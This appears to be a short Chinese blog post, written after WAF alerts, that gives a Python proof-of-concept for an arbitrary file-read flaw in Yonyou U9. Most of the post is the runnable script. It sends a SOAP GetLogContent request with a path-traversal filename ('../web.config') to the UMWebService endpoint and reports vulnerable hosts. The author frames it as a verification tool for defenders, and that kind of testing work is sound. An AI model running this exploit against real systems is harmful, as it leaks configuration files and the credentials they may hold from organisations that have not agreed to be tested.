一、背景

值守期间遇到产品waf上很多的任意读取文件告警；查看为用友U9产品随机有了该漏洞的验证POC。

二、POC编写

import argparse
import requests
import sys

# 创建poc模块接收参数
def cmd(url):
    # 创建payliad
    payload = "/OnLine/UMWebService.asmx?op=GetLogContent"
    url1 = f"{url}{payload}"
    headers = {
        'Content-Type': 'text/xml; charset=utf-8',
        'Content-Length': "length",
        'SOAPAction': "http://tempuri.org/GetLogContent"
    }
    data = f'''<?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
        <soap:Body>
            <GetLogContent xmlns="http://tempuri.org/">
            <fileName>../web.config</fileName>
            </GetLogContent>
        </soap:Body>
        </soap:Envelope>
            '''
    try:
        r = requests.post(url1,headers=headers, data=data,verify=False, timeout=5)
        if "UFSoft.UBF.UI" in r.text:
            print(f"[*]{url1}\n存在任意文件读取漏洞")
        else:
            print(f"[-]{url1}\n不存在任意文件读取漏洞")
    except Exception as e:
        # 异常回复
        print(f"[-]{url}存在异常，请检查！！！")
        sys.exit(1)  # 异常退出


def main():
    # 字符画
    banner = """
  _____        _          _____            _    
 |  __ \      | |        |  __ \          | |   
 | |  | | __ _| |_ __ _  | |__) |__ _  ___| | __
 | |  | |/ _` | __/ _` | |  _  // _` |/ __| |/ /
 | |__| | (_| | || (_| | | | \ \ (_| | (__|   < 
 |_____/ \__,_|\__\__,_| |_|  \_\__,_|\___|_|\_\
 
作者：添衣&吹風  地址：https://blog.csdn.net/weixin_53884648

        """
    print(banner)
    print("用友U9产品漏洞")
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", dest="url", required=True, default=None, help="请输入url地址")
    # parser.add_argument("-p","--port",type=int,help="请输入端口")
    # parser.add_argument("-c",dest="cmd",required=False,type=str,default="whoami",help="输入执行命令")
    args = parser.parse_args()
    cmd(args.url)


if __name__ == '__main__':
    main()